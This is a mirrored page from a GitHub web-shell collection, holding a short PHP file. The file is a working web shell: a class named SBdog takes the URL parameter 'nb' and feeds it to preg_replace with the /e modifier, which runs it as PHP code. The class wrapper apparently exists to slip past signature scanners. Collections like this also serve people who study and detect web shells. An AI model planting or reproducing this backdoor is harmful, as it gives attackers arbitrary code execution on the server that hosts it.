mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
12 lines
180 B
PHP
12 lines
180 B
PHP
<?php
|
|
class SBdog{
|
|
public $x;
|
|
function dog(){
|
|
$this->x=$_GET['nb'];
|
|
}
|
|
}
|
|
$class=new SBdog();
|
|
$class->dog();
|
|
$a=$class->x;
|
|
preg_replace("/dog/e", $a, "I am a sb dog");
|
|
?>
|